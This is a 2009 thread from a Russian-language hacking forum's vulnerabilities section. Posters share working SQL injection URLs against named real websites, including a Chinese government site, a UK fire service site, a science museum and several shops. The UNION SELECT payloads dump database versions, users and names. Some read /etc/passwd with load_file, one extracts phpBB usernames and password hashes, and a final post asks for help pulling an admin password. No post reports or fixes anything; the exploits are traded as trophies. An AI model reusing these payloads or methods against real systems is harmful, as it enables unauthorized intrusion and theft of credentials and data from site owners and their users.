HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.08.2009, 20:37
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

Код:
http://www.kent.fire-uk.org//playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/*
kentfire@medwaypctdemo.netsite.co.uk:5.0.22:KFRSLi ve
 
Ответить с цитированием

  #2  
Старый 12.08.2009, 20:55
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.msop.avtograd.ru/people.php?action=show&id=1-1%20union%20select%201,2,concat_ws(0x3a,username,u ser_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18%20from%20phpbb2_users%20limit%201,1--

Вот и пасс от форума только в хеш -(( а на форуме бд н а 36 000 человек..
 
Ответить с цитированием

  #3  
Старый 12.08.2009, 21:21
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 5

Код:
http://www.kyfestivals.com/details.php?id=-125'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,29+from+mysql.user/*
Database Version: 4.1.22
Database name: kyfestivals
User name: setel@localhost
 
Ответить с цитированием

  #4  
Старый 12.08.2009, 23:26
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR6
Код:
http://www.cckc.gov.cn/cckc/lnw/news_view.php?id=2+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7--
Database Version: 5.0.75-0ubuntu10
Database name: cckc2005_lnw
User name: cress@localhost
 
Ответить с цитированием

  #5  
Старый 13.08.2009, 00:04
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Цитата:
http://www.kbb-forum.net/journal/content.php3?id=21+union+select+1,concat(0x2,datab ase(),user(),version()),3,4,5,6,7,8,9,10,11,12+lim it+1,1
Цитата:
http://www.universaledition.com/truman/en_templates/view.php3?f_id=17+union+select+concat_ws(0x3,versi on(),user(),database()),2
5.0.32-Debian_7etch8-log www@localhost truman
 
Ответить с цитированием

  #6  
Старый 13.08.2009, 01:02
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://kryolan.s10.omatix.de/en/index.php?mnu=612&id=35+limit+0+UNION+SELECT+1,CON CAT(version(),database(),user()),3,4--

database Version: 5.0.32-Debian_7etch8-log
database name: kryolansql1
user name: kryolansql1@localhost
 
Ответить с цитированием

  #7  
Старый 13.08.2009, 01:32
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 8
http://exploratorium.edu/webcasts/explotv_player.php?id=-00000759+union+select+version(),2,3/*

Database Version: 5.0.33
Database name: ExploMedia
User name: MediaRead@207-7-139-21.exploratorium.edu
 
Ответить с цитированием

  #8  
Старый 13.08.2009, 01:28
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.gripskateshop.co.uk/index.php?ID=35+limit+0+UNION+SELECT+1,CONCAT(vers ion(),database(),user()),3,4,5,6--

database Version: 5.0.82-community
database name: web36-user-2
user name: web36-user-2@localhost
 
Ответить с цитированием

  #9  
Старый 13.08.2009, 01:31
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://pescaderiascorunesas.es/gran_cocina/autor/?id=-13+union+select+1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9--
4.1.25-Debian_mt1db25093_pescaderiasdb25093@64.13.232.33
 
Ответить с цитированием

  #10  
Старый 13.08.2009, 01:42
lexus5122
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084

Репутация: 2
По умолчанию

http://www.eored.ru/faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

Видно что есть инъекция, но запрос походу не верный ( иначе бы показался админский пасс с солью (
Помогите пожалуйста сформировать правельный...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ